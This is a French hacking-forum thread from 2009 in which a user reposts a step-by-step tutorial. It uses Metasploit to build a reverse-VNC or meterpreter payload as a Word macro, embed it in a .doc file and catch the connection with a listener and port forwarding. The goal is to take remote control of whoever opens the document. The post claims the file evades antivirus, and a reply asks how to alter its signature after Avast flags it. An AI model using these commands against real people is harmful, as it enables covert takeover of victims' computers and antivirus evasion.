Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 01-06-2009 20:14:37

dittohead
Banni(e)
Inscription : 30-01-2009
Messages : 73

metasploit vnc reverse dans un doc sur BT

bjr,


je poste un ptit truc qui a eté publié sur backtrack-fr.net par un gars nommé mattoufoutu, peut etre que vous conaissez, en tout cas c trés puissant, et ca marche aussi bien en LAN qu'en remote:

il faut avoir Word sur windows et backtrack 3, metasploit bien mis a jour et une clé usb pour transferer le fichier .bas. je precise quand meme que avec le vnc c assez lent puis le pointeur de la victime disparait donc c flag perso je trouve que ca fonctionne bcp mieux en shell ou en meterpreter(trés pratique)

IMPORTANT: Pour utiliser cet exploit en remote, il faut rediriger le port 4444 (utilisé par metasploit pour l'exploit) vers votre machine.

Seul truc je sais pas si c'est toujours indetecté par les antivirus..

----

Dans ce tuto, nous allons utiliser Metasploit pour créer une macro pour Word, laquelle une fois exécutée, lancera un reverse vnc. Et pour couronner le tout, le fichier Word contenant la macro passe sans encombres les tests des anti-virus.


Créer la macro qui sera intégrée au fichier Word:
./msfpayload windows/vncinject/reverse_tcp LHOST=VOTRE_IP V > /chemin/du/fichier/vbvnc.bas
et la transférer sur un poste windows


ex dans un shell sous bt3:

./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.2 V > /chemin/.../vbvnc.bas
(PS: pour l'ip si c'est en remote il faut inscrire l'ip externe, si c'est en LAN l'adresse ip interne.)

on peux utiliser tout les autres payloads de metasploit a la place du payload VNC par ex:
./msfpayload windows/meterpreter/reverse_tcp  LHOST=192.168.1.2 V > /chemin/.../vbvnc.bas


Transferez ensuite le fichier vbvnc.bas sur windows en ayant verifié qu'il ne fait pas que 0 k, ce qui peut arriver si metasploit n'est pas mis a jour.


Sous windows, ouvrir Word (la procédure suivante a été effectuée sous Word2007):
Tout d'abord faire afficher l'onglet "Développeur" qui permettra d'insérer une macro au fichier:
Boutton de démarrage Word > Options Word > Section "Standard" > Cocher "Afficher l'onglet Développeur..."
Aller dans l'onglet "Développeur" pour ajouter la macro, et cliquer sur le boutton "Visual Basic"
Dans la nouvelle fenetre, importer la macro:
Fichier > Importer un fichier > Sélectionner le fichier vbvnc.bas > Fichier > Enregister (comme type de fichier, choisir .doc ou .docm)
Fermer la fenetre Visual Basic ainsi que Word.


De retour sous BackTrack, lancer Metasploit:
./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=VOTRE_IP DisableCourtesyShell=True E

pour l'ip c donc la meme que celle pour le payload.


Lorsque la cible sur le poste windows ouvrira le fichier, il lui sera demandé si elle souhaite accepter ou non l'exécution de la macro, si elle accepte, la connexion sera initiée, et le client VNC(ou pas) s'ouvrira sur le poste BackTrack.

A savoir aussi que le payload n'est utilisable qu'une seule fois, si on veux recommencer, il faut recompiler le payload (vbvnc.bas) a partir de backtrack.

Dernière modification par dittohead (02-06-2009 02:13:12)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 06-06-2009 06:01:29

ccmp
Membre Indétronable
Inscription : 06-11-2008
Messages : 177

Re : metasploit vnc reverse dans un doc sur BT

merci

j'ai un question sur la redirection du port

dittohead a écrit :

IMPORTANT: Pour utiliser cet exploit en remote, il faut rediriger le port 4444 (utilisé par metasploit pour l'exploit) vers votre machine.

http://www.crack-wifi.com/tutoriel-redi … ivebox.php

est ce que si j'active la dmz sur mon ip réseau ça suffit ou je dois faire une redirection comme sur le tuto ci dessus ?

merci

edit: avast reconnais le fichier word comme un trojan est il possible modifier la signature et comment  ?

Dernière modification par ccmp (06-06-2009 09:12:25)

Hors Ligne

#3 06-06-2009 18:49:57

dittohead
Banni(e)
Inscription : 30-01-2009
Messages : 73

Re : metasploit vnc reverse dans un doc sur BT

ouais normalement en dmz ca doit fonctionner aussi.

ya quelque mois il etait indetecté, plus maintenant apparement..

Hors Ligne

#4 08-06-2009 11:11:57

ex-tel
Banni(e)
Lieu : FRANCE
Inscription : 31-12-2008
Messages : 255

Re : metasploit vnc reverse dans un doc sur BT

Tous le monde est a l'affut de nouveaux exploits.

Il y a d'une part les exploits rendus publique, ou la contre-attaque est tres rapide.
Puis les exploits prives, qui vivent paisiblement durant un certain temps !


wifiso2.png

Hors Ligne

#5 08-06-2009 11:55:30

dittohead
Banni(e)
Inscription : 30-01-2009
Messages : 73

Re : metasploit vnc reverse dans un doc sur BT

tout facon, en parlant hacking pur et dur, ya tjrs quelque chose a faire, des failles yen a des millions en scannant des plages ip, tellement que ca devient dangereux, tu trouve tjrs quelque chose d'exploitable, et tu veux tjrs aller voir plus loin..jusqu'au jour on ton FAI te tappe sur les doigts ou si t'es vraiment aller trop loin, tu te vois les flic arriver chez toi a 6h du mat lol

Hors Ligne

#6 12-06-2009 11:53:50

ccmp
Membre Indétronable
Inscription : 06-11-2008
Messages : 177

Re : metasploit vnc reverse dans un doc sur BT

moi je suivais dittohead avec assiduité c dommage que ça finisse comme ça j'espère que ça va s'arranger

on a tous des hauts et des bas et ici y'a trop de noobs alors reviens nous calme car j'ai pas finie d'apprendre

@ plus et peace

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.024 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]